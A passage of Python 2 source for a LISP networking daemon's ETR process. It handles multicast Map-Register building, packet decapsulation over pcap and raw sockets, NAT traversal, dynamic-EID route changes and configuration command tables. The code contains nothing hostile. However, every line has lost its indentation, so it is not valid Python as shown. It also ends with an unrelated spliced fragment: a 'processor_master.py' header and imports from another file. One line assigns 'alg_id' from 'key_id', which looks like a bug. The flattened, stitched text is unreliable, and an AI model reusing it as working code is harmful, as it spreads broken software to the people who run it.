ms_list[ms_dns_name][1] += 1
#
# Build our RLOC entry.
#
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc_name = rloc_name
#
# Decide on RLE address. Have NAT-traversal take precedent, otherwise
# use configured RLE in group-mapping. If one wasn't configured use
# lisp_myrlocs IPv4 address.
#
if (translated_rloc != None):
rle_node.address = translated_rloc
elif (rle_addr != None):
rle_node.address = rle_addr
else:
rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
#endif
rloc_record.rle = rle
rloc_record.local_bit = True
rloc_record.reach_bit = True
rloc_record.priority = 255
rloc_record.weight = 0
rloc_record.mpriority = 1
rloc_record.mweight = 100
eid_records += rloc_record.encode()
rloc_record.print_record(" ")
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
rloc_record.print_record(" RTR ")
#endfor
#
# Add EID-records to correct map-server name set.
#
ms_list[ms_dns_name][0] += eid_records
#endfor
#
# Build map-server independent fields.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.proxy_reply_requested = True
map_register.map_notify_requested = False
map_register.merge_register_requested = True
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
key = ms.dns_name if decent else ms.ms_name
#
# Get EID-records from correct map-server name set.
#
if (ms_list.has_key(key) == False): continue
#
# Build map-server specific fields.
#
map_register.record_count = ms_list[key][1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.alg_id = ms.key_id
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
packet = packet + eid_records + trailer
ms.map_registers_multicast_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Go build more EID-records.
#
time.sleep(.001)
#endfor
return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_etr_data_plane(parms, not_used, packet):
global lisp_ipc_listen_socket, lisp_send_sockets
device = parms[0]
lisp_raw_socket = parms[1]
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
if (lisp.lisp_is_macos() == False):
offset = 4 if device == "lo0" else 16
packet = packet[offset::]
#endif
#
# Check IGMP packet.
#
protocol = struct.unpack("B", packet[9])[0]
if (protocol == 2):
entries = lisp.lisp_process_igmp_packet(packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments. Do this only when
# not doing NAT-traversal. Otherwise, the kernel will do it when we
# receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
#
sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
packet = lisp.lisp_reassemble(packet)
if (packet == None): return
packet = lisp.lisp_packet(packet)
status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
if (status == None): return
#
# Print some useful header fields.
#
packet.print_packet("Receive", True)
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
source = packet.inner_source.print_address_no_iid()
packet.strip_outer_headers()
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
# (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet[36::]
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
source = packet.outer_source.print_address_no_iid()
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
f_or_b = lisp.bold("Forward", False)
#
# Process inner header (checksum and decrement ttl).
#
igmp = False
L2 = packet.inner_dest.is_mac()
if (L2):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
f_or_b = lisp.bold("Bridge", False)
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
if (igmp):
entries = lisp.lisp_process_igmp_packet(packet.packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet (through NAT)")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
#
# We are going to forward or bridge the decapsulated packet.
#
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# If we are decapsulating a MAC frame, then use the L2 socket where
# the MAC header is already in packet.
#
if (L2):
packet.bridge_l2_packet(packet.inner_dest, db)
return
#endif
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is a RTR encapsulated this packet that is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
global lisp_ipc_listen_socket, lisp_send_sockets
#
# Decode LISP header.
#
lisp_header = packet
packet = lisp.lisp_packet(packet[8::])
if (packet.lisp_header.decode(lisp_header) == False): return
#
# Store outer source RLOC address so if we are doing lisp-crypto across
# NAT-traversal, we can find the decryption key.
#
packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
lisp.LISP_IPV4_HOST_MASK_LEN, 0)
status = packet.decode(False, lisp_ipc_listen_socket,
lisp.lisp_decap_stats)
if (status == None): return
#
# Special case to log packets with no outer header but are considered
# decapsulated when coming through NATs. Since packets are sent from
# source port 4341, the kernel will strip outer header, so we don't have
# outer header context in lisp_packet().
#
if (lisp.lisp_flow_logging): packet.log_flow(False)
packet.print_packet("Kernel-decap", False)
lisp.dprint(packet.lisp_header.print_header(" "))
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
sport = packet.udp_sport
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on ephemeral socket. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
#endif
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format( \
lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out on raw socket.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping and send a Map-Register for each configured IPv6
# source for the IPv6 group-prefix found.
#
def lisp_register_ipv6_group_entries(group, joinleave):
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None): return
sg = []
for s in ms_gm.sources:
sg.append([s, group, joinleave])
#endfor
lisp_send_multicast_map_register(lisp_send_sockets, sg)
return
#enddef
#
# lisp_etr_join_leave_process
#
# Look at file-system to see if there is a join or leave to be done. This
# function will send joins in the form of building an IP/IGMPv2 packet to
# be passed to lisp_process_igmp_packet(). The groups that are joined are
# ones found as filenames in the current directory as "join-<group>". The
# IGMP Reports wil lbe sent to lisp_process_igmp_packet() every 30 seconds.
#
# For right now, if the group address is IPv6, send a Map-Register directly.
# We will get to MLD support later.
#
# This is used for testing and not meant for production deployment.
#
def lisp_etr_join_leave_process():
global lisp_send_sockets
lisp.lisp_set_exception()
swap = socket.htonl
ipigmp = [swap(0x46000020), swap(0x9fe60000), swap(0x0102d7cc),
swap(0x0acfc15a), swap(0xe00000fb), swap(0x94040000)]
packet = ""
for l in ipigmp: packet += struct.pack("I", l)
#
# Look for files in current directory for "join-<group>" and then send
# an IGMPv2 report to ourselves.
#
while (True):
groups = commands.getoutput("ls join-*").replace("join-", "")
groups = groups.split("\n")
for group in groups:
if (lisp.lisp_valid_address_format("address", group) == False):
continue
#endif
ipv6 = (group.find(":") != -1)
#
# Check if we are leaving group.
#
leavejoin = os.path.exists("leave-{}".format(group))
lisp.lprint("Internal {} group {}".format( \
"leaving" if leavejoin else "joining", group))
#
# Set IGMP message to Report or Leave. Then add group.
#
if (ipv6):
if (group.lower().find("ff02:") != -1):
lisp.lprint("Suppress registration for link-local groups")
continue
#endif
lisp_register_ipv6_group_entries(group, (leavejoin == False))
else:
send_packet = packet
if (leavejoin):
send_packet += struct.pack("I", swap(0x17000000))
else:
send_packet += struct.pack("I", swap(0x16000000))
#endif
octet = group.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
send_packet += struct.pack("I", swap(value))
sg = lisp.lisp_process_igmp_packet(send_packet)
if (type(sg) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, sg)
#endif
time.sleep(.100)
#endif
#endfor
time.sleep(10)
#endwhile
return
#enddef
#
# lisp_etr_process
#
# This thread is for receiving encapsulated LISP packets address to destination
# port 4341. As well as IGMP reports. The IGMP reports can be captured on
# Ubuntu and Fedora but not on MacOS. The former supports IGMPv3 and the
# latter supports IGMPv2 if we listen on "en0".
#
def lisp_etr_process():
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
#
# Find all multicast RLEs so we can receive packets on underlay multicast
# groups.
#
rles = lisp.lisp_get_all_multicast_rles()
#
# We need to listen on en0 when doing IGMP testing on MacOS.
#
device = "any"
# device = "en0" if lisp.lisp_is_macos() else "any"
# device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 1600, 0, 100)
pfilter = "(proto 2) or "
pfilter += "((dst host "
for addr in lisp.lisp_get_all_addresses() + rles:
pfilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(udp src port 4341) or "
pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
device))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
return
#enddef
#
# lisp_etr_startup
#
# Intialize this LISP ETR process. This function returns no values.
#
def lisp_etr_startup():
global lisp_ipc_listen_socket
global lisp_ephem_socket
global lisp_send_sockets
global lisp_raw_socket
global lisp_l2_socket
global lisp_mac_header
lisp.lisp_i_am("etr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ETR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
# of using pytun. See below.
#
# m = lisp.lisp_mymacs.keys()[0]
# mac = ""
# for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
# lisp_mac_header = mac + mac + "\x86\xdd"
# lisp.dprint("Built MAC header for L2 socket:",
# lisp.lisp_format_packet(lisp_mac_header))
#
# Used on for listening for Info-Replies for NAT-traversal support.
#
s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
lisp_ephem_socket = s
#
# Open network send socket and internal listen socket.
#
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
lisp_send_sockets[0] = lisp_ephem_socket
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open a L2 socket so when we decapsulate and have to route an IPv6
# packet, we have the kernel receive a MAC frame on the loopback interface.
# We do this because there is no IP_HDRINCL for IPv6 raw sockets.
#
# Disabling this code in favor of using a tuntap tun interface via the
# pytun module. See code right below.
#
# if ("PF_PACKET" in dir(socket)):
# interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
# "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
# if (interface != None):
# lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
# lisp_l2_socket.bind(("lo", 0x86dd))
# #endif
# #endif
#
# Setup tuntap tunnel interface so when we decap IPv6 packets, we can
# send to kernel to route them.
#
if (pytun != None):
lisp_mac_header = '\x00\x00\x86\xdd'
device = "lispers.net"
try:
lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
name=device)
os.system("ip link set dev {} up".format(device))
except:
lisp.lprint("Cannot create tuntap interface")
#endtry
#endif
#
# Start thread to listen on data socket.
#
threading.Thread(target=lisp_etr_process, args=[]).start()
#
# Test code to force IGMPv2 joins and leaves on an airplane. ;-)
#
threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():
global lisp_register_timer
global lisp_etr_info_timer
#
# Cancel periodic Map-Register and Info timer threads.
#
if (lisp_register_timer): lisp_register_timer.cancel()
if (lisp_etr_info_timer): lisp_etr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):
ipc = ipc.split("%")
eid_str = ipc[1]
interface = ipc[2]
if (interface == "None"): interface = None
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_address(eid_str)
#
# Do database-mapping lookup.
#
db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
if (db == None or db.dynamic_eid_configured() == False):
lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
format(lisp.green(eid_str, False)))
return
#endif
#
# Do logic checks. That is do not remove an entry if it is not there and
# don't try to add an entry if it is already cached.
#
dyn_eid = None
if (db.dynamic_eids.has_key(eid_str)): dyn_eid = db.dynamic_eids[eid_str]
if (dyn_eid == None and interface == None):
lisp.lprint("ITR/ETR state mismatch for {}".format( \
lisp.green(eid_str, False)))
return
#endif
#
# Check if ITR is changing the interface to the same interface, meaning
# it is confused. Otherwise, the IPC is an interface change. Don't register
# in this case.
#
if (dyn_eid and interface):
if (dyn_eid.interface == interface):
lisp.lprint("ITR sent redundant IPC for {}".format( \
lisp.green(eid_str, False)))
else:
lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
lisp.green(eid_str, False), dyn_eid.interface, interface))
dyn_eid.interface = interface
#endif
return
#endif
#
# Add new entry and register it.
#
if (interface):
dyn_eid = lisp.lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = interface
dyn_eid.get_timeout(interface)
db.dynamic_eids[eid_str] = dyn_eid
reg = lisp.bold("Registering", False)
eid_str = lisp.bold(eid_str, False)
lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
lisp.green(eid_str, False), interface, dyn_eid.timeout))
lisp_build_map_register(lisp_send_sockets, None, eid, None, False)
#
# Add /32 to routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route add {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
return
#endif
#
# Remove existig entry and deregister it.
#
if (db.dynamic_eids.has_key(eid_str)):
interface = db.dynamic_eids[eid_str].interface
dereg = lisp.bold("Deregistering", False)
lisp.lprint("{} dynamic-EID {}".format(dereg,
lisp.green(eid_str, False)))
lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
db.dynamic_eids.pop(eid_str)
#
# Delete /32 from routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route delete {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
#endif
return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It is telling the lisp-etr process if
# RLOC-probing has determined if the RTR has gone up or down. And therefore
# if it should be registered to the mapping system.
#
def lisp_etr_process_rtr_updown(ipc):
if (lisp.lisp_register_all_rtrs): return
opcode, rtr_str, status = ipc.split("%")
if (lisp.lisp_rtr_list.has_key(rtr_str) == False): return
lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
lisp.red(rtr_str, False), lisp.bold(status, False)))
rtr = lisp.lisp_rtr_list[rtr_str]
if (status == "down"):
lisp.lisp_rtr_list[rtr_str] = None
return
#endif
rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
lisp.lisp_rtr_list[rtr_str] = rtr
return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process an nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
def lisp_etr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
if (opcode == "R"):
echo_nonce.request_nonce_sent = nonce
lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
elif (opcode == "E"):
echo_nonce.echo_nonce_sent = nonce
lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
#endif
return
#enddef
#
# ETR commands procssed by this process.
#
lisp_etr_commands = {
"lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-server" : [lisp_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_etr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp group-mapping" : [lisp_group_mapping_command, {
"group-name" : [False],
"ms-name" : [True],
"group-prefix" : [False],
"instance-id" : [True, 0, 0xffffffff],
"rle-address" : [False],
"sources" : [],
"address" : [True] }],
"show database-mapping" : [lisp_etr_show_command, { }],
"show etr-keys" : [lisp_etr_show_keys_command, {}],
"show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_etr_startup() == False):
lisp.lprint("lisp_etr_startup() failed")
lisp.lisp_print_banner("ETR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Info-Reply messages received on ephemeral port.
#
if (lisp_ephem_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ephem_socket, False)
if (source == ""): break
if (port == lisp.LISP_DATA_PORT):
lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
source, port)
#
# Info-Reply from map-server has new RTR-list, trigger a
# Map-Register and a Info-Request to the RTR.
#
if (send_register):
lisp_etr_info_timer = threading.Timer(0,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
lisp_register_timer = threading.Timer(0,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
#endif
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet.find("learn%") != -1):
lisp_etr_discover_eid(packet)
elif (packet.find("nonce%") != -1):
lisp_etr_process_nonce_ipc(packet)
elif (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
elif (packet.find("rtr%") != -1):
lisp_etr_process_rtr_updown(packet)
elif (packet.find("stats%") != -1):
packet = packet.split("%")[-1]
lisp.lisp_process_data_plane_decap_stats(packet, None)
else:
lispconfig.lisp_process_command(lisp_ipc_listen_socket,
opcode, packet, "lisp-etr", [lisp_etr_commands])
#endif
elif (opcode == "api"):
lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
processor_master.py | #!usr/bin/env python3
import os
import logging
import socket
import threading
from textwrap import dedent
import ast
import yaml
import multiprocessing as mp
import astropy.units as u
